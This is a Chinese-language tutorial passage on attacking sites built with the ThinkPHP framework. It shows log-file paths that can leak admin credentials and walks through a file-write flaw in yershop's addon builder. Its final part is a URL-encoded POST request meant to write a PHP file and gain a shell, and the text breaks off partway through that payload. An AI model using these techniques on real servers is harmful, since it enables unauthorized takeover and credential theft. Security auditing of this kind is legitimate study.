php5渗透,ThinkPHP的一些渗透方式

下面由thinkphp框架教程栏目给大家介绍ThinkPHP的一些渗透方式，希望对需要的朋友有所帮助！

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，可以支持Windows/Unix/Linux等服务器环境，正式版需要PHP5.0以上版本支持，支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。

Runtime日志

在ThinkPHP3的版本中，入口文件index.php是跟应用目录、框架目录在同一个目录下的，在DEBUG开启的状态下，会在runtime生成日志文件，泄露一些管理员登录后台的账号密码等。tp3的日志文件命名规则为：根目录(或者应用目录)/Runtime/Logs/Admin/20_08_17.log(年份前2位_月份_日.log)

在tp5的版本中，入口文件index是在public的目录下，它跟应用目录、框架目录不在同一个目录，但是有些管理员会将入口文件放置到跟应用目录、框架目录同目录，tp5的命名规则为：

./runtime/log/202008/17.log(./runtime/log/年月/日.log)

file_put_contents函数

在ThinkPHP3中，后台有时会写入配置文件来getshell的，所以我倾向全局查找这个file_put_contents函数，然后在网上找个代码--yershop(TP3开发的那个版本)来进行审计，后台可以通过写入文件来拿shell。全局查找file_put_contents函数，发现控制器AddonsController.class.php中的build存在。

发现存在两处写入文件，这里第一处需要满足以下条件：$addon_dir可控,$data可控,$addonModel可控

第二处需要满足：$data['has_config'] == 1,$addon_dir可控

跟踪发现$data是从全局POST获取的，所有可控，即$addon_dir可控。

构造payload如下，后台创建扩展。

点击确定，抓包，首先会判断标识名这个插件是否存在，不存在就执行build访问。

由于要写入config.php这个文件需要满足$data['has_config'] == 1，最后构造payload。

访问：index.php?s=/Admin/Addons/build.html

POST发送：info%5Bname%5D=Example&info%5Btitle%5D=%E7%A4%BA%E5%88%97&info%5Bversion%5D=0.1&info%5Bauthor%5D=%E6%97%A0%E5%90%8D&info%5Bdescription%5D=%E8%BF%99%E6%98%AF%E4%B8%80%E4%B8%AA%E4%B8%B4%E6%97%B6%E6%8F%8F%E8%BF%B0&info%5Bstatus%5D=1&config=%3C%3Fphp%0D%0Areturn+array(%0D%0A%09'random'%3D%3Earray(%2F%2F%E9%85%8D%E7%BD%AE%E5%9C%A8%E8%A1%A8%E5%8D%95%E4%B8%AD%E7%9A%84%E9%94%AE%E5%90%8D+%2C%E8%BF%99%E4%B8%AA%E4%BC%9A%E6%98%AFconfi